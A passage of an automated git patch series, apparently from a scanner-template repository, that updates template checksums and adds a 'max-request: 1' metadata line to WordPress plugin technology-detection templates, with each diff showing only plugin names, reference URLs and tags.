+http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7064,7 +7065,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:d1363330eb619d738de57e1fe24b99d7c1dc77ae +templates-checksum.txt:0bf645923ff27bf08f9c0d2e6caa0208241d6fbe wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From d74f7ba29e105c7c4cc02379c721b82c52da589d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 14 Sep 2023 17:37:45 +0000 Subject: [PATCH 0354/1090] TemplateMan Update [Thu Sep 14 17:37:45 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index f68ad2a6bf..ac77f4e5f5 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - 